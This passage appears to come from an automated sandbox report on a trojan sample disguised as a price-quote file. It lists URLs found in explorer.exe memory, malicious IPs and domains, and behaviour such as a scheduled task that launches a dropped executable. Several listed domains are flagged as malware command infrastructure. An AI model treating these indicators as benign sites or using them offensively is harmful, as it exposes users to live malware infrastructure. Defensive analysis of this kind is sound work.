http://www.autoitscript.com/autoit3/J	explorer.exe, 00000010.00000003.3083086936.00000000085DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3899996423.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291121734.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3899916237.00000000085DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537572614.00000000085D0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tasteitmakeit.comReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.theavenuclinic.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dewdrop.store/ifrg/www.vespeciative.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.vespeciative.com/ifrg/www.skatingisamazing.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gdminsheng.icu	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mndhhy.store/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.micros	explorer.exe, 00000010.00000000.1544349922.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSJM	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://outlook.com	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tasteitmakeit.com/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://127.0.0.1:	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.bezobotnation.netReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSZM	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.alivenode.com/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.bezobotnation.net/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.dewdrop.store/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.alivenode.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.yelp.com	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.boat-insurance-today.worldReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.transporteturisticofradan.space/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?z$	explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tasteitmakeit.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mndhhy.storeReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.theavenuclinic.com/ifrg/www.ecodfairs.top	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.boat-insurance-today.world	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000010.00000002.3883360063.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.1536745748.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.3899764247.00000000082D0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://parade.com/61481/toriavey/where-did-hamburgers-originate	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.theavenuclinic.com/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zysport.net	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/~T	explorer.exe, 00000010.00000003.3081820013.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dewdrop.storeReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.oliverstamatatos.comReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.75241.shop/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.theavenuclinic.comReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ecodfairs.top/ifrg/www.bezobotnation.net	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.75241.shop	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.zysport.netReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.gdminsheng.icu/ifrg/www.dewdrop.store	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.157.1	ssl1.prod.systemdragon.com	United States	13335	CLOUDFLARENETUS	true
66.203.148.230	www.75241.shop	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	true
198.54.117.242	www.bezobotnation.net	United States	22612	NAMECHEAP-NETUS	true
212.129.41.217	vespeciative.com	France	12876	OnlineSASFR	true
38.6.237.43	www.alivenode.com	United States	174	COGENT-174US	true
3.33.130.190	theavenuclinic.com	United States	8987	AMAZONEXPANSIONGB	true
108.179.194.28	transporteturisticofradan.space	United States	46606	UNIFIEDLAYER-AS-1US	true
154.12.93.8	256.93cu.com	United States	174	COGENT-174US	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1327821
Start date and time:	2023-10-18 08:33:18 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@20/12@11/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 177 Number of non-executed functions: 330
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 8.252.66.254, 8.252.202.254, 8.252.15.254, 8.252.72.254, 8.250.203.254
Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:34:25	Task Scheduler	Run new task: ySqETqNvdTbE path: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
08:34:19	API Interceptor	1x Sleep call for process: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe modified
08:34:24	API Interceptor	13x Sleep call for process: powershell.exe modified
08:34:25	API Interceptor	1x Sleep call for process: ySqETqNvdTbE.exe modified
08:34:35	API Interceptor	7354873x Sleep call for process: explorer.exe modified
08:35:14	API Interceptor	8119309x Sleep call for process: cmstp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.157.1	wLlREXsA9M.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.lasik-de-de-8808230.zone/ms14/?1b-=0MCVt3ro+Y2fULC7mglHTnfgc1Mr+oeAYZcaZJUD5Vdcg90q3P52QZV9uqsVct+gY69j&5jjx=X41P
